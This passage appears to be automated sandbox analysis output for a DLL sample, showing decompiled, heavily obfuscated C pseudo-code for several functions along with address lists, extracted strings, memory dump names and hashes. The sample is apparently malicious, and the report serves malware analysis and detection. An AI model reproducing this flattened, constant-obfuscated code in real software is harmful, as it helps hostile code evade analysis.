				_v600 = _v600 ^ 0x0d880c60;
				_v600 = _v600 ^ 0x0deba949;
				_v616 = 0xb65c97;
				_v616 = _v616 + 0xffff6050;
				_v616 = _v616 << 6;
				_v616 = _v616 ^ 0x2d666d98;
				_v640 = 0xcc6d21;
				_t243 = 0x1b;
				_v640 = _v640 / _t243;
				_v640 = _v640 >> 0xe;
				_v640 = _v640 ^ 0x000eaea1;
				_v680 = 0x87d5f6;
				_t244 = 0x76;
				_v680 = _v680 * 0x1f;
				_v680 = _v680 << 9;
				_v680 = _v680 + 0xffff990b;
				_v680 = _v680 ^ 0xe5dd4258;
				_v608 = 0xe96961;
				_v608 = _v608 | 0xb6f9188e;
				_v608 = _v608 ^ 0xb6fb8930;
				_v656 = 0xc61929;
				_v656 = _v656 >> 2;
				_v656 = _v656 + 0xcacc;
				_v656 = _v656 << 2;
				_v656 = _v656 ^ 0x00c38b27;
				_v648 = 0x21afdf;
				_v648 = _v648 + 0x614;
				_v648 = _v648 + 0x692f;
				_v648 = _v648 ^ 0x002627a2;
				_v620 = 0xc6d0;
				_v620 = _v620 + 0xee3f;
				_t240 = _v608;
				_v620 = _v620 / _t244;
				_v620 = _v620 ^ 0x0005d3ba;
				do {
					while(_t261 != 0x885c2e) {
						if(_t261 == 0x1fa5b7d) {
							_t244 = _v628;
							_t233 = E02B50DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
							_t268 = _t268 + 0xc;
							__eflags = _t233;
							if(__eflags != 0) {
								_t261 = 0x6c35f0b;
								continue;
							}
						} else {
							if(_t261 == 0x4edc737) {
								_push(_t244);
								_t236 = E02B4DBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
								_t258 = _v680;
								_t244 = _v640;
								asm("sbb esi, esi");
								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
								E02B51538(_t244, _t258, _t240);
								_t268 = _t268 + 0x1c;
								goto L14;
							} else {
								if(_t261 == 0x6c35f0b) {
									_t258 = _v636;
									_t244 =  &_v524;
									_t238 = E02B545CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
									_t240 = _t238;
									_t268 = _t268 + 0x30;
									__eflags = _t238 - 0xffffffff;
									if(__eflags != 0) {
										_t261 = 0x4edc737;
										continue;
									}
								} else {
									if(_t261 == 0x8f2e6fb) {
										_t239 = E02B35477(_t244);
										_t266 = _v588 - _v548;
										asm("sbb ecx, [esp+0x9c]");
										__eflags = _v584 - _t258;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t259 = 1;
												__eflags = 1;
											} else {
												__eflags = _t266 - _t239;
												if(_t266 >= _t239) {
													goto L19;
												}
											}
										}
									} else {
										if(_t261 != 0xb8e9ee3) {
											goto L14;
										} else {
											_t261 = 0x1fa5b7d;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t259;
					}
					_t244 = _v608;
					E02B4CA1F(_t244, _v656,  &_v588, _v648, _v620);
					_t268 = _t268 + 0xc;
					_t261 = 0x8f2e6fb;
					L14:
					__eflags = _t261 - 0x203d9a3;
				} while (__eflags != 0);
				goto L20;
			}

0x02b36711
0x02b3671b
0x02b36727
0x02b36729
0x02b3672e
0x02b36735
0x02b3673d
0x02b36744
0x02b36747
0x02b3674b
0x02b36753
0x02b3675b
0x02b36763
0x02b36768
0x02b36770
0x02b36778
0x02b36780
0x02b36785
0x02b3678d
0x02b36795
0x02b3679a
0x02b367a2
0x02b367aa
0x02b367b7
0x02b367bb
0x02b367c3
0x02b367cb
0x02b367d3
0x02b367db
0x02b367e0
0x02b367ed
0x02b367f1
0x02b367f9
0x02b36801
0x02b36806
0x02b3680a
0x02b3680f
0x02b36813
0x02b3681b
0x02b36823
0x02b36828
0x02b3682c
0x02b36831
0x02b36839
0x02b36841
0x02b3684e
0x02b36852
0x02b36857
0x02b3685f
0x02b3686c
0x02b3686d
0x02b36871
0x02b36876
0x02b3687b
0x02b36883
0x02b3688b
0x02b36893
0x02b3689b
0x02b368a3
0x02b368ab
0x02b368b3
0x02b368bb
0x02b368c0
0x02b368c8
0x02b368d5
0x02b368df
0x02b368e5
0x02b368f2
0x02b368fa
0x02b368ff
0x02b36904
0x02b3690c
0x02b36914
0x02b3691c
0x02b36924
0x02b3692c
0x02b36934
0x02b3693c
0x02b36941
0x02b36949
0x02b36957
0x02b3695c
0x02b36962
0x02b36967
0x02b3696f
0x02b3697c
0x02b3697d
0x02b36981
0x02b36986
0x02b3698e
0x02b36996
0x02b3699e
0x02b369a6
0x02b369ae
0x02b369b6
0x02b369bb
0x02b369c3
0x02b369c8
0x02b369d0
0x02b369d8
0x02b369e0
0x02b369e8
0x02b369f0
0x02b369f8
0x02b36a06
0x02b36a0a
0x02b36a0e
0x02b36a16
0x02b36a16
0x02b36a24
0x02b36afb
0x02b36aff
0x02b36b04
0x02b36b07
0x02b36b09
0x02b36b0b
0x00000000
0x02b36b0b
0x02b36a2a
0x02b36a30
0x02b36aa5
0x02b36ac1
0x02b36ac6
0x02b36acc
0x02b36ad3
0x02b36adb
0x02b36ae1
0x02b36ae6
0x00000000
0x02b36a32
0x02b36a38
0x02b36a7b
0x02b36a81
0x02b36a88
0x02b36a8d
0x02b36a8f
0x02b36a92
0x02b36a95
0x02b36a9b
0x00000000
0x02b36a9b
0x02b36a3a
0x02b36a40
0x02b36b45
0x02b36b4e
0x02b36b59
0x02b36b60
0x02b36b62
0x02b36b64
0x02b36b6a
0x02b36b6c
0x02b36b6c
0x02b36b66
0x02b36b66
0x02b36b68
0x00000000
0x00000000
0x02b36b68
0x02b36b64
0x02b36a46
0x02b36a4c
0x00000000
0x02b36a52
0x02b36a52
0x00000000
0x02b36a52
0x02b36a4c
0x02b36a40
0x02b36a38
0x02b36a30
0x02b36b6d
0x02b36b79
0x02b36b79
0x02b36b25
0x02b36b2a
0x02b36b2f
0x02b36b32
0x02b36b37
0x02b36b37
0x02b36b37
0x00000000

Strings

?, xrefs: 02B369F8
/i, xrefs: 02B369E0
:, xrefs: 02B3673D
w , xrefs: 02B36823
Cq, xrefs: 02B368B3
=, xrefs: 02B36801
ai, xrefs: 02B36996

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /i$?$ai$w $:$Cq$=
API String ID: 0-170593755
Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction ID: 4d1aa5d86d1dae62016f71bdc7d272c891a3137ef87bf3f8ebb64052e6d8efe8
Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction Fuzzy Hash: 2EB13F728083809FC369CF64C58A90BFBE5BBD4748F108A1DF5E9A6220D3B58949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 02B44A66, Relevance: 7.8, Strings: 6, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E02B44A66() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				void* __ebx;
				void* _t271;
				void* _t272;
				intOrPtr _t277;
				intOrPtr _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t289;
				intOrPtr _t294;
				intOrPtr _t311;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr _t325;
				signed int* _t327;
				void* _t330;

				_t327 =  &_v640;
				_v532 = 0x9eda53;
				_v528 = 0x2697e4;
				_t289 = 0xd8634eb;
				_t325 = 0;
				_v524 = 0;
				_v580 = 0x257a8f;
				_v580 = _v580 + 0xffff0a69;
				_t317 = 0x46;
				_v580 = _v580 / _t317;
				_v580 = _v580 ^ 0x00008592;
				_v556 = 0x213626;
				_t16 =  &_v556; // 0x213626
				_t318 = 0x3f;
				_v556 =  *_t16 * 0x37;
				_v556 = _v556 ^ 0x0722a203;
				_v564 = 0xc854a8;
				_v564 = _v564 >> 0xd;
				_v564 = _v564 ^ 0x000f067d;
				_v568 = 0x3071d1;
				_v568 = _v568 + 0xffff48c8;
				_v568 = _v568 ^ 0x002621f6;
				_v548 = 0x47fca2;
				_v548 = _v548 ^ 0x7cca96d7;
				_v548 = _v548 ^ 0x7c82555f;
				_v624 = 0xc0bc8e;
				_v624 = _v624 | 0x773eab6a;
				_v624 = _v624 + 0x32c;
				_v624 = _v624 + 0xe315;
				_v624 = _v624 ^ 0x77fb7a9a;
				_v544 = 0x592636;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0xc9333252;
				_v572 = 0x38b1a;
				_v572 = _v572 ^ 0xe2d962db;
				_v572 = _v572 ^ 0xe2dfc1be;
				_v592 = 0x205e14;
				_v592 = _v592 + 0xffffa7ef;
				_v592 = _v592 + 0xffff7efd;
				_v592 = _v592 ^ 0x001a340d;
				_v540 = 0xa56fb;
				_v540 = _v540 ^ 0x6fafefe0;
				_v540 = _v540 ^ 0x6fae5e5f;
				_v616 = 0x18df03;
				_v616 = _v616 >> 6;
				_v616 = _v616 + 0x4bd4;
				_v616 = _v616 * 0xb;
				_v616 = _v616 ^ 0x000ee45e;
				_v632 = 0xf97e7d;
				_v632 = _v632 >> 0xe;
				_v632 = _v632 << 1;
				_v632 = _v632 >> 8;
				_v632 = _v632 ^ 0x0007c205;
				_v588 = 0x1ac705;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 | 0x5b484d5d;
				_v588 = _v588 ^ 0x5b49b1bf;
				_v608 = 0xcfa712;
				_v608 = _v608 << 0xb;
				_v608 = _v608 + 0xffff02b3;
				_v608 = _v608 / _t318;
				_v608 = _v608 ^ 0x01ff3be8;
				_v600 = 0x40b8c7;
				_v600 = _v600 >> 0xe;
				_v600 = _v600 + 0xffff3f18;
				_v600 = _v600 ^ 0xffff31b4;
				_v560 = 0xb86873;
				_v560 = _v560 * 0x79;
				_v560 = _v560 ^ 0x572fdc31;
				_v596 = 0x3e642a;
				_t319 = 0x51;
				_v596 = _v596 / _t319;
				_t320 = 0x15;
				_v596 = _v596 / _t320;
				_v596 = _v596 ^ 0x00087e57;
				_v636 = 0x2d2a20;
				_t132 =  &_v636; // 0x2d2a20
				_t321 = 0x64;
				_v636 =  *_t132 * 0x60;
				_v636 = _v636 + 0xd33d;
				_v636 = _v636 << 5;
				_v636 = _v636 ^ 0x1e1aa121;
				_v640 = 0xb10dcc;
				_v640 = _v640 | 0xc382035c;
				_v640 = _v640 << 7;
				_v640 = _v640 | 0x409aa621;
				_v640 = _v640 ^ 0xd99a11e4;
				_v584 = 0xf23298;
				_v584 = _v584 / _t321;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x09bffa87;
				_v620 = 0xffd84f;
				_v620 = _v620 + 0x561c;
				_v620 = _v620 + 0x86f;
				_v620 = _v620 ^ 0xc18b30ac;
				_v620 = _v620 ^ 0xc08b73c8;
				_v628 = 0x373ddb;
				_v628 = _v628 | 0x384c5e9f;
				_v628 = _v628 >> 0xc;
				_v628 = _v628 + 0xc32f;
				_v628 = _v628 ^ 0x000038bb;
				_v604 = 0xfde248;
				_v604 = _v604 + 0xffff394c;
				_t322 = 0x71;
				_v604 = _v604 * 0xa;
				_v604 = _v604 ^ 0x90dc5ac9;
				_v604 = _v604 ^ 0x99310c60;
				_v576 = 0xeb2acc;
				_v576 = _v576 / _t322;
				_v576 = _v576 >> 0xf;
				_v576 = _v576 ^ 0x000b47a1;
				_v612 = 0xe0e237;
				_t199 =  &_v612; // 0xe0e237
				_t323 = 0x22;
				_v612 =  *_t199 * 0x63;
				_v612 = _v612 << 0xf;
				_v612 = _v612 + 0xffff9396;
				_v612 = _v612 ^ 0xbdacf125;
				_v552 = 0xa3e3d4;
				_t324 = _v536;
				_v552 = _v552 / _t323;
				_v552 = _v552 ^ 0x00068221;
				goto L1;
				do {
					while(1) {
						L1:
						_t330 = _t289 - 0xa9836df;
						if(_t330 > 0) {
							break;
						}
						if(_t330 == 0) {
							E02B33046(_v616, _v632, _v588, _t324, _v608);
							_t327 =  &(_t327[3]);
							L12:
							_t289 = 0xc26911c;
							continue;
						}
						if(_t289 == 0x7276a71) {
							_v536 = _v580;
							goto L12;
						}
						if(_t289 == 0x85778ce) {
							L02B407F4(0xa9836df);
							_t289 = 0x9029ee2;
							continue;
						}
						if(_t289 == 0x9029ee2) {
							E02B50DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
							_t283 = E02B3EFE1(_v576, _v612, _v552,  &_v520);
							_t294 =  *0x2b56214; // 0x0
							 *((intOrPtr*)(_t294 + 4)) = _t283;
							L23:
							return _t325;
						}
						if(_t289 != 0x9959e7d) {
							goto L20;
						}
						_t285 = E02B4E8B6(_t289, _v572, _v592, _t289, _v564, _v540);
						_t324 = _t285;
						_t327 =  &(_t327[4]);
						if(_t285 == 0) {
							_t289 = 0x7276a71;
						} else {
							_t287 =  *0x2b56214; // 0x0
							 *((intOrPtr*)(_t287 + 0x20)) = 1;
							_t289 = 0xdb6aac8;
						}
					}
					__eflags = _t289 - 0xc26911c;
					if(_t289 == 0xc26911c) {
						_t311 =  *0x2b56214; // 0x0
						_t271 = E02B31A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
						_t327 =  &(_t327[8]);
						_t289 = 0x85778ce;
						__eflags = _t271;
						_t272 = 1;
						_t325 =  ==  ? _t272 : _t325;
						goto L20;
					}
					__eflags = _t289 - 0xd8634eb;
					if(_t289 == 0xd8634eb) {
						_push(_t289);
						_push(_t289);
						_t277 = E02B3C5D8(0x444);
						_t327 =  &(_t327[3]);
						 *0x2b56214 = _t277;
						_t289 = 0x9959e7d;
						goto L1;
					}
					__eflags = _t289 - 0xdb6aac8;
					if(__eflags != 0) {
						goto L20;
					}
					_t289 = 0xa9836df;
					_v536 = _v556;
					goto L1;
					L20:
					__eflags = _t289 - 0xdb6d293;
				} while (__eflags != 0);
				goto L23;
			}

0x02b44a66
0x02b44a6c
0x02b44a76
0x02b44a7e
0x02b44a86
0x02b44a88
0x02b44a8f
0x02b44a97
0x02b44aa6
0x02b44aab
0x02b44ab1
0x02b44ab9
0x02b44ac1
0x02b44ac6
0x02b44ac7
0x02b44acb
0x02b44ad3
0x02b44adb
0x02b44ae0
0x02b44ae8
0x02b44af0
0x02b44af8
0x02b44b00
0x02b44b08
0x02b44b10
0x02b44b18
0x02b44b20
0x02b44b28
0x02b44b30
0x02b44b38
0x02b44b40
0x02b44b48
0x02b44b4d
0x02b44b55
0x02b44b5d
0x02b44b65
0x02b44b6d
0x02b44b75
0x02b44b7d
0x02b44b85
0x02b44b8d
0x02b44b95
0x02b44b9d
0x02b44ba5
0x02b44bad
0x02b44bb2
0x02b44bbf
0x02b44bc3
0x02b44bcb
0x02b44bd3
0x02b44bd8
0x02b44bdc
0x02b44be1
0x02b44be9
0x02b44bf1
0x02b44bf6
0x02b44bfe
0x02b44c06
0x02b44c0e
0x02b44c13
0x02b44c21
0x02b44c25
0x02b44c2d
0x02b44c35
0x02b44c3a
0x02b44c42
0x02b44c4a
0x02b44c57
0x02b44c5b
0x02b44c65
0x02b44c7d
0x02b44c82
0x02b44c8c
0x02b44c91
0x02b44c97
0x02b44c9f
0x02b44ca7
0x02b44cac
0x02b44caf
0x02b44cb3
0x02b44cbb
0x02b44cc0
0x02b44cc8
0x02b44cd0
0x02b44cd8
0x02b44cdd
0x02b44ce5
0x02b44ced
0x02b44cfd
0x02b44d01
0x02b44d06
0x02b44d0e
0x02b44d16
0x02b44d1e
0x02b44d26
0x02b44d2e
0x02b44d36
0x02b44d3e
0x02b44d46
0x02b44d4b
0x02b44d53
0x02b44d5b
0x02b44d63
0x02b44d70
0x02b44d73
0x02b44d77
0x02b44d7f
0x02b44d87
0x02b44d97
0x02b44d9b
0x02b44da0
0x02b44da8
0x02b44db0
0x02b44db5
0x02b44db6
0x02b44dba
0x02b44dbf
0x02b44dc7
0x02b44dcf
0x02b44ddd
0x02b44de1
0x02b44de5
0x02b44de5
0x02b44ded
0x02b44ded
0x02b44ded
0x02b44ded
0x02b44def
0x00000000
0x00000000
0x02b44df5
0x02b44e83
0x02b44e88
0x02b44e6b
0x02b44e6b
0x00000000
0x02b44e6b
0x02b44dfd
0x02b44e67
0x00000000
0x02b44e67
0x02b44e05
0x02b44e57
0x02b44e5c
0x00000000
0x02b44e5c
0x02b44e0d
0x02b44f39
0x02b44f56
0x02b44f5b
0x02b44f64
0x02b44f68
0x02b44f73
0x02b44f73
0x02b44e19
0x00000000
0x00000000
0x02b44e30
0x02b44e35
0x02b44e37
0x02b44e3c
0x02b44e50
0x02b44e3e
0x02b44e3e
0x02b44e46
0x02b44e49
0x02b44e49
0x02b44e3c
0x02b44e8d
0x02b44e8f
0x02b44ef3
0x02b44f02
0x02b44f07
0x02b44f0a
0x02b44f0f
0x02b44f13
0x02b44f14
0x00000000
0x02b44f14
0x02b44e91
0x02b44e97
0x02b44ec0
0x02b44ec1
0x02b44ec7
0x02b44ecc
0x02b44ecf
0x02b44ed4
0x00000000
0x02b44ed4
0x02b44e99
0x02b44e9f
0x00000000
0x00000000
0x02b44ea5
0x02b44ea7
0x00000000
0x02b44f17
0x02b44f17
0x02b44f17
0x00000000

Strings

6&Y, xrefs: 02B44B40
7, xrefs: 02B44DB0
*d>, xrefs: 02B44C65
*-, xrefs: 02B44CA7
&6!, xrefs: 02B44AC1
]MH[, xrefs: 02B44BF6

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: *-$&6!$*d>$6&Y$7$]MH[
API String ID: 0-1885758756
Opcode ID: de200d9766deda8d29e2d95beb72a97f3ec7f8f3f251010681b5a3275b90847e
Instruction ID: 3807ed3c0c22924697af515a978a5c408a9e232ce66a97348afbc5271d2fff49
Opcode Fuzzy Hash: de200d9766deda8d29e2d95beb72a97f3ec7f8f3f251010681b5a3275b90847e
Instruction Fuzzy Hash: 73D120B15083809FD368CF65C58991BFBF1FBC4758F208A1DF2968A260D7B58999CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B4CCD9, Relevance: 7.7, Strings: 6, Instructions: 227
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E02B4CCD9(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t282;
				void* _t283;
				signed int _t285;
				signed int* _t287;
				signed int* _t288;

				_t287 =  &_v100;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x71e8b0;
				_v36 = 0x18cf5b;
				_v36 = _v36 + 0x6698;
				_v36 = _v36 ^ 0x001a117a;
				_v60 = 0xa2890;
				_t282 = __edx;
				_t248 = __ecx;
				_t283 = 0x72ed85;
				_t250 = 0x42;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0xe73bacde;
				_v60 = _v60 ^ 0xe73fbe74;
				_v40 = 0x9c8291;
				_t251 = 0x70;
				_v40 = _v40 / _t251;
				_v40 = _v40 ^ 0x000cc374;
				_v64 = 0xa8df6e;
				_t252 = 0x66;
				_v64 = _v64 * 0x5a;
				_v64 = _v64 | 0x6df616d5;
				_v64 = _v64 ^ 0x7ff9e958;
				_v88 = 0xc174cb;
				_v88 = _v88 ^ 0xe7b64a13;
				_v88 = _v88 ^ 0xc84137a7;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0x60915aca;
				_v32 = 0x752193;
				_v32 = _v32 * 0x3f;
				_v32 = _v32 ^ 0x1cda7702;
				_v92 = 0x141833;
				_v92 = _v92 + 0xffffc8f8;
				_v92 = _v92 + 0xf362;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0xd48431d2;
				_v96 = 0xc34044;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffff536d;
				_v96 = _v96 + 0x5d23;
				_v96 = _v96 ^ 0xc334c852;
				_v20 = 0x3a6348;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x6343ca6d;
				_v56 = 0x49cd71;
				_v56 = _v56 ^ 0x72d9145f;
				_v56 = _v56 + 0x4f98;
				_v56 = _v56 ^ 0x7290366b;
				_v24 = 0x3bf83a;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x77f6a760;
				_v28 = 0x632842;
				_v28 = _v28 + 0xffffe69b;
				_v28 = _v28 ^ 0x006ee443;
				_v48 = 0x4b2ed5;
				_v48 = _v48 ^ 0x82c7a85b;
				_v48 = _v48 + 0xffff7c4b;
				_v48 = _v48 ^ 0x8282f052;
				_v52 = 0x4c7b52;
				_v52 = _v52 + 0xffffbc1f;
				_v52 = _v52 + 0x2e12;
				_v52 = _v52 ^ 0x004752b1;
				_v16 = 0x3a13fc;
				_v16 = _v16 / _t252;
				_v16 = _v16 ^ 0x00081e0d;
				_v84 = 0x8573c6;
				_t253 = 0x4b;
				_v84 = _v84 / _t253;
				_v84 = _v84 | 0x42242f90;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x00008b33;
				_v100 = 0x3509ce;
				_t254 = 0x19;
				_v100 = _v100 / _t254;
				_t285 = 0x44;
				_t255 = 0x6f;
				_v100 = _v100 * 0x31;
				_v100 = _v100 + 0x6b64;
				_v100 = _v100 ^ 0x006714bf;
				_v68 = 0x65eeb7;
				_v68 = _v68 + 0x24bd;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x330bb4b3;
				_v72 = 0x31388d;
				_v72 = _v72 * 0x77;
				_v72 = _v72 / _t285;
				_v72 = _v72 ^ 0x00560572;
				_v76 = 0x10ecc2;
				_v76 = _v76 | 0x28471304;
				_v76 = _v76 + 0xcdda;
				_v76 = _v76 ^ 0x285661a5;
				_v44 = 0xf32c83;
				_v44 = _v44 / _t255;
				_v44 = _v44 / _t285;
				_v44 = _v44 ^ 0x000ff213;
				_v80 = 0xb9f4a0;
				_v80 = _v80 << 0xa;
				_v80 = _v80 + 0xd38f;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00ede5ae;
				_v12 = 0x138f30;
				_v12 = _v12 ^ 0xf49e1969;
				_v12 = _v12 ^ 0xf48aec3a;
				while(1) {
					L1:
					_t242 = 0xd8fe181;
					do {
						L2:
						while(_t283 != 0x72ed85) {
							if(_t283 == 0xb6c7232) {
								_t278 = _v52;
								_t255 = _v48;
								_t243 = E02B51005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
								_t287 =  &(_t287[3]);
								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
								__eflags = _t243;
								_t242 = 0xd8fe181;
								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t283 == 0xc5020c9) {
								_push(_v64);
								_t244 = E02B53263(_v36, _v60, __eflags, _t248, _v40, _t255);
								_t288 =  &(_t287[4]);
								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
								__eflags = _t244;
								if(_t244 != 0) {
									E02B5148A(_t244, _t244, _v88, _v32, _v92, _v96);
									_t278 = _v56;
									_t255 = _v20;
									E02B3E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
									_t287 =  &(_t288[7]);
									_t283 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t283 == 0xd6f812a) {
									return E02B3F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
								}
								if(_t283 != _t242) {
									goto L13;
								} else {
									_t244 = E02B40EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E02B525F1);
									_t287 =  &(_t287[8]);
									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
									if(_t244 == 0) {
										_t283 = 0xd6f812a;
										while(1) {
											L1:
											_t242 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t244;
						}
						_t283 = 0xc5020c9;
						L13:
						__eflags = _t283 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t242;
				}
			}

0x02b4ccd9
0x02b4ccdc
0x02b4cce1
0x02b4cce9
0x02b4ccf1
0x02b4ccf9
0x02b4cd01
0x02b4cd11
0x02b4cd13
0x02b4cd19
0x02b4cd1e
0x02b4cd23
0x02b4cd29
0x02b4cd31
0x02b4cd39
0x02b4cd45
0x02b4cd4a
0x02b4cd50
0x02b4cd58
0x02b4cd65
0x02b4cd66
0x02b4cd6a
0x02b4cd72
0x02b4cd7a
0x02b4cd82
0x02b4cd8a
0x02b4cd92
0x02b4cd97
0x02b4cd9f
0x02b4cdac
0x02b4cdb0
0x02b4cdb8
0x02b4cdc0
0x02b4cdc8
0x02b4cdd0
0x02b4cdd5
0x02b4cddd
0x02b4cde5
0x02b4cdea
0x02b4cdf2
0x02b4cdfa
0x02b4ce02
0x02b4ce0a
0x02b4ce0f
0x02b4ce17
0x02b4ce1f
0x02b4ce27
0x02b4ce2f
0x02b4ce37
0x02b4ce3f
0x02b4ce44
0x02b4ce4c
0x02b4ce54
0x02b4ce5c
0x02b4ce64
0x02b4ce6c
0x02b4ce74
0x02b4ce7c
0x02b4ce84
0x02b4ce8c
0x02b4ce94
0x02b4ce9c
0x02b4cea4
0x02b4ceb2
0x02b4ceb6
0x02b4cec0
0x02b4cece
0x02b4ced3
0x02b4ced7
0x02b4cedf
0x02b4cee4
0x02b4ceec
0x02b4cefa
0x02b4ceff
0x02b4cf0a
0x02b4cf0d
0x02b4cf0e
0x02b4cf12
0x02b4cf1a
0x02b4cf22
0x02b4cf2a
0x02b4cf32
0x02b4cf37
0x02b4cf3f
0x02b4cf4c
0x02b4cf58
0x02b4cf5c
0x02b4cf64
0x02b4cf6c
0x02b4cf74
0x02b4cf7c
0x02b4cf84
0x02b4cf94
0x02b4cfa3
0x02b4cfa7
0x02b4cfaf
0x02b4cfb7
0x02b4cfbc
0x02b4cfc4
0x02b4cfc9
0x02b4cfd1
0x02b4cfd9
0x02b4cfe1
0x02b4cfe9
0x02b4cfe9
0x02b4cfe9
0x02b4cfee
0x00000000
0x02b4cfee
0x02b4d000
0x02b4d0bc
0x02b4d0c0
0x02b4d0c4
0x02b4d0c9
0x02b4d0cc
0x02b4d0cf
0x02b4d0d3
0x02b4d0d8
0x00000000
0x02b4d0d8
0x02b4d00c
0x02b4d04e
0x02b4d060
0x02b4d065
0x02b4d068
0x02b4d06b
0x02b4d06d
0x02b4d087
0x02b4d097
0x02b4d09b
0x02b4d09f
0x02b4d0a4
0x02b4d0a7
0x00000000
0x02b4d0a7
0x02b4d00e
0x02b4d010
0x00000000
0x02b4d108
0x02b4d018
0x00000000
0x02b4d01e
0x02b4d037
0x02b4d03c
0x02b4d03f
0x02b4d044
0x02b4d04a
0x02b4cfe9
0x02b4cfe9
0x02b4cfe9
0x00000000
0x02b4cfe9
0x02b4cfe9
0x02b4d044
0x02b4d018
0x02b4d110
0x02b4d110
0x02b4d0e0
0x02b4d0e5
0x02b4d0e5
0x02b4d0e5
0x00000000
0x02b4cfee

Strings

Hc:, xrefs: 02B4CE02
dk, xrefs: 02B4CF12
Cn, xrefs: 02B4CE5C
R{L, xrefs: 02B4CE84
$P, xrefs: 02B4CD0F, 02B4D023
#], xrefs: 02B4CDF2

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #]$$P$Cn$Hc:$R{L$dk
API String ID: 0-1551317889
Opcode ID: faa714c31a34689363f49168046c88f3e435edaf1598058270aa1d84753a8a65
Instruction ID: 6d1b8c0b85bc865324883be49c05a017b0887802261f74da8e7d4a2be7a309ea
Opcode Fuzzy Hash: faa714c31a34689363f49168046c88f3e435edaf1598058270aa1d84753a8a65
Instruction Fuzzy Hash: DEB142B29083419FD358CF25C58941BFBE2FBC8748F008A2DF69996260D7B5C949CF86

Uniqueness

